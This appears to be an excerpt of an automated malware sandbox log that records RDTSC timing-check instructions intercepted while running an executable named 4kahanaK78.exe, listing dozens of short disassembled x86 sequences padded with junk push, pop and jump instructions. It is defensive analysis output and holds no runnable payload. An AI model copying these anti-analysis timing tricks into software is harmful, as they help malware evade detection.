Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9582 second address: 9C959E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C959E second address: 9C95A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C95A2 second address: 9C9670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d sbb di, 0E15h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov cx, D4BFh 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F0E05506CE8h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov dword ptr [ebp+124801FBh], esp 0x00000044 mov edx, dword ptr [ebp+122D35D2h] 0x0000004a cmp dword ptr [ebp+122D3526h], 00000000h 0x00000051 jne 00007F0E05506DEDh 0x00000057 push 00000000h 0x00000059 push ebp 0x0000005a call 00007F0E05506CE8h 0x0000005f pop ebp 0x00000060 mov dword ptr [esp+04h], ebp 0x00000064 add dword ptr [esp+04h], 00000016h 0x0000006c inc ebp 0x0000006d push ebp 0x0000006e ret 0x0000006f pop ebp 0x00000070 ret 0x00000071 jmp 00007F0E05506CEDh 0x00000076 mov ecx, dword ptr [ebp+122D362Eh] 0x0000007c mov byte ptr [ebp+122D1B46h], 00000047h 0x00000083 mov edx, dword ptr [ebp+122D37AEh] 0x00000089 mov dword ptr [ebp+122D26E9h], eax 0x0000008f mov eax, D49AA7D2h 0x00000094 sub dword ptr [ebp+122D1B73h], esi 0x0000009a nop 0x0000009b jns 00007F0E05506CEEh 0x000000a1 push edi 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9670 second address: 9C9683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E055074FAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9683 second address: 9C9687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9687 second address: 9C9691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9A50 second address: 9C9AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnc 00007F0E05506CECh 0x0000000d popad 0x0000000e xor dword ptr [esp], 36142F5Eh 0x00000015 push ecx 0x00000016 and ch, 00000027h 0x00000019 pop ecx 0x0000001a call 00007F0E05506CE9h 0x0000001f jmp 00007F0E05506CF6h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E05506CF2h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9AA4 second address: 9C9ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F0E055074FCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9ACF second address: 9C9B08 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E05506CE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push esi 0x0000000f jmp 00007F0E05506CF5h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a jnc 00007F0E05506CECh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9B08 second address: 9C9B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9BC1 second address: 9C9BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9BC7 second address: 9C9BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9E61 second address: 9C9E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9F9C second address: 9C9FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F0E055074F8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov di, 06CBh 0x00000027 push 00000004h 0x00000029 mov edx, dword ptr [ebp+122D3622h] 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9C9FDA second address: 9C9FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0DFD3 second address: A0DFF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507508h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E318 second address: A0E323 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E323 second address: A0E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E329 second address: A0E334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E05506CE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E5D1 second address: A0E5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E055074F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E5E0 second address: A0E5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0E05506CE6h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jl 00007F0E05506CE6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E720 second address: A0E726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E726 second address: A0E72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E72B second address: A0E743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pushad 0x00000008 jno 00007F0E055074F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E895 second address: A0E8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jp 00007F0E05506CE6h 0x0000000e jmp 00007F0E05506CF5h 0x00000013 popad 0x00000014 push edi 0x00000015 jmp 00007F0E05506CF6h 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F0E05506CF2h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E8E6 second address: A0E908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507508h 0x00000009 jnc 00007F0E055074F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A0E908 second address: A0E936 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E05506CE6h 0x00000008 jmp 00007F0E05506CF5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E05506CEDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A11C5E second address: A11C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A11C62 second address: A11C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A11C6A second address: A11C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507502h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A13FA2 second address: A13FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0E05506CF6h 0x0000000e pushad 0x0000000f jbe 00007F0E05506CECh 0x00000015 jng 00007F0E05506CE6h 0x0000001b je 00007F0E05506CEEh 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 980087 second address: 9800A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05507507h 0x00000009 jg 00007F0E055074F6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9800A9 second address: 9800AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9800AE second address: 9800B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9800B4 second address: 9800BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A1980F second address: A19829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jmp 00007F0E05507502h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A1DEAE second address: A1DEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A1E2B8 second address: A1E2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F0E05507507h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A1E2DA second address: A1E2F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF8h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A1E2F7 second address: A1E305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CA1F2 second address: 9CA1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CA1F6 second address: 9CA1FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CA1FC second address: 9CA231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0E05506CE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f movzx ecx, si 0x00000012 push 00000004h 0x00000014 or edx, 7183FC00h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F0E05506CF8h 0x00000023 jmp 00007F0E05506CF2h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9CA231 second address: 9CA23B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E055074FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A23453 second address: A2346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2346F second address: A234A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E05507508h 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e ja 00007F0E055074FCh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F0E055074FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A234A7 second address: A234BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CEFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A234BA second address: A234BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2376D second address: A23771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A23B7E second address: A23B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2C300 second address: A2C305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2A4B0 second address: A2A4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E055074FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2A4C0 second address: A2A4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2A4C8 second address: A2A4CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2A4CD second address: A2A4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2A60C second address: A2A610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2A79C second address: A2A7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jg 00007F0E05506CE8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jc 00007F0E05506CEEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2AD3A second address: A2ADA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E05507508h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007F0E05507504h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 jng 00007F0E05507502h 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F0E055074F6h 0x00000024 jmp 00007F0E05507509h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A2B2E8 second address: A2B2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0E05506CE6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A30CA6 second address: A30CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A33E89 second address: A33E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3456D second address: A34579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F0E055074F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3D515 second address: A3D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3D51E second address: A3D522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3BE9A second address: A3BEAF instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E05506CF7h 0x00000008 jmp 00007F0E05506CEBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3BEAF second address: A3BED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E05507505h 0x0000000a jmp 00007F0E055074FFh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnl 00007F0E055074F8h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3C013 second address: A3C01F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E05506CE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3C313 second address: A3C319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3C319 second address: A3C31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3C31F second address: A3C325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3CC82 second address: A3CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3CC92 second address: A3CC9C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E055074F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A3B29A second address: A3B2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A40871 second address: A408AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E055074F6h 0x00000008 jnc 00007F0E055074F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F0E05507508h 0x00000016 jmp 00007F0E05507502h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A45488 second address: A454A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A454A0 second address: A454B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507500h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: A44E8B second address: A44E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44E91 second address: A44E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44E95 second address: A44EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0E05506CE8h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44EAA second address: A44EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F0E055074F6h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A50CC3 second address: A50CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A52B71 second address: A52B9B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E055074F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F0E0550750Eh 0x00000012 jmp 00007F0E05507508h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5289D second address: A528BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0E05506CF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A528BA second address: A528D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05507503h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A528D6 second address: A528DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A540BC second address: A540C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A56BDC second address: A56BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A56711 second address: A56726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 jp 00007F0E055074F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A56726 second address: A5672B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
